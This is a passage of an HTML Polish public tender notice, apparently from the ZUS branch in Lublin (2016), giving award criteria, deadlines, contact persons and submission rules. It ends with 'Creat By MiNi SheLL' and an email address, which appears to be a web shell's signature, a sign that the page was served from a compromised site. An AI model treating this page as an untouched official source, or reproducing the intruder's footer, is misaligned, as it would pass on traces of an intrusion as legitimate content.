4. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt. III.4.3.1), zastępuje się je  dokumentem  zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju,  w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione  nie wcześniej niż 6 miesięcy ( tiret 1)  lub 3 miesiące ( tiret 2)  przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - okres gwarancji - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus. pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w formie papierowej (bezpłatna) można odebrać  w siedzibie Zamawiającego, ZUS Oddział  w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 902 lub pocztą..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IV, pok. Nr 406 - budynek  przy  ul. T. Zana 38C.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.   Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub  art. 134 ust. 6 pkt 3 i 4 ustawy.

2.  Specyfikacja Istotnych Warunków Zamówienia (SIWZ)  zamieszczona będzie na stronie internetowej  Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia   w Biuletynie Zamówień Publicznych (ogłoszenie będzie opublikowane w dniu 05.04.2016r.  na portalu UZP)  do upływu terminu składania ofert.

3. Pracownikami  uprawnionymi  do kontaktów z wykonawcami  w sprawach nie dotyczących wyjaśnienia treści SIWZ są:  Włodzimierz Koczkodaj  tel/fax: (81) 535-77-94 , e-mail: Wlodzimierz.Koczkodaj@zus.pl    oraz  Andrzej  Orzechowski   -   tel: (81) 535-77-24,   e-mail:  Andrzej.Orzechowski@zus.pl   w godz. 07:15 -15:15.

4.Otwarcie ofert nastąpi w dniu  21.04.2016r.  o godzinie 12:30 w siedzibie   Zamawiającego, piętro IV,  sala nr 414 - budynek  przy ul T. Zana 36A.

5. Termin związania ofertą - 30 dni od daty składania ofert -  bieg terminu związania  ofertą rozpoczyna się wraz z upływem terminu składania ofert.

6. Zamawiający nie przewiduje zawarcia umowy ramowej.

7. Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia.

8. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.

9. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia, o których mowa  w art. 151a ustawy.

10.  Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia, o których mowa  w art. 151a ustawy.


11.  Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa w art. 29 ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych i młodocianych w celu przygotowania zawodowego, niepełnosprawnych i innych ,  o których mowa w przepisach o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego.


12. Postępowanie, którego dotyczy ogłoszenie, nie może być unieważnione  na   podstawie    art. 93   ust. 1a ustawy, tj. z powodu nie przyznania środków pochodzących z budżetu Unii Europejskiej lub środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia  o Wolnym Handlu (EFTA), gdyż zamówienie nie jest finansowane z takich środków.

13. Na podstawie art. 27.1 ustawy Zamawiający ustala faksową (nr faksu: 81 535-77-94) lub  elektroniczną Wlodzimierz.Koczkodaj@zus.pl (w postaci skanów  dokumentów podpisanych przez wykonawcę lub osobę uprawnioną )  formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień; przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna  ( w szczególności forma ta jest obowiązująca dla  oferty  i dokumentów składanych jako uzupełnienie oferty na wezwanie Zamawiającego) z zastrzeżeniem wyjątków przewidzianych w ustawie.  W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl .

14.   Kryteria oceny ofert i ich znaczenie - cena brutto oferty- 85%;  okres gwarancji  -  15%..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com